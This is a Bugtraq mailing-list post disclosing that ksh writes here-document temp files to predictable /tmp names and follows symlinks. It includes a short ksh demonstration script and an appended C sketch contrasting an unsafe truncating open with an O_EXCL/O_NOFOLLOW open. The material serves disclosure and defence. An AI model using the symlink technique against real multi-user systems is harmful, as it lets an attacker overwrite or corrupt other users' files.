Bugtraq mailing list archives
/bin/ksh creates insecure tmp files
From: Paul Szabo <psz () MATHS USYD EDU AU>
Date: Thu, 21 Dec 2000 09:11:37 +1100
Recently I reported that, similarly to the recently discussed tcsh vulnerability, the Bourne shell /bin/sh creates temporary files in an insecure way:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716 () milan maths usyd edu au

At the time I also tested the Korn shell ksh, and it seemed safe... but no, ksh is in fact also vulnerable. (Is this all shells? We have seen tcsh, bash, sh and now ksh fail...)

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Paul Szabo - psz () maths usyd edu au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney  2006  Australia
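As an added illustration, not part of the original post or of any shell's source: the C sketch below contrasts a truncating open on a predictable name, which follows a pre-existing symlink as in the demonstration above, with an O_CREAT|O_EXCL open that refuses it. The scratch directory, the file names victim and heredoc, and the function names are assumptions made for this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Truncating open on a predictable name: follows a symlink already planted there. */
static int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened open: fails if anything, including a symlink, already exists at path. */
static int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario in a private scratch directory: "victim" plays silly.1 and
   "heredoc" plays /tmp/sh$$.1. Returns victim's size after the write, -1 on setup error. */
off_t victim_size_after(int (*opener)(const char *), int *open_errno) {
    char dir[] = "/tmp/heredoc-demo-XXXXXX";
    char victim[64], link_path[64];
    const char text[] = "Just some short text\n";
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link_path, sizeof link_path, "%s/heredoc", dir);
    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);  /* touch victim */
    if (fd < 0 || close(fd) != 0 || symlink(victim, link_path) != 0) return -1;
    fd = opener(link_path);               /* the shell opening its here-document file */
    *open_errno = fd < 0 ? errno : 0;
    if (fd >= 0) {
        if (write(fd, text, sizeof text - 1) < 0) perror("write");
        close(fd);
    }
    off_t size = stat(victim, &st) == 0 ? st.st_size : -1;
    unlink(link_path); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    int e1, e2;
    off_t a = victim_size_after(open_predictable, &e1);
    off_t b = victim_size_after(open_exclusive, &e2);
    printf("predictable: victim=%ld bytes; exclusive: victim=%ld bytes, errno=%d\n",
           (long)a, (long)b, e2);
    return 0;
}
```

A change in the victim file's size is the same signal the post's ls -l comparison looks for; with the exclusive open the file stays empty and the open fails instead.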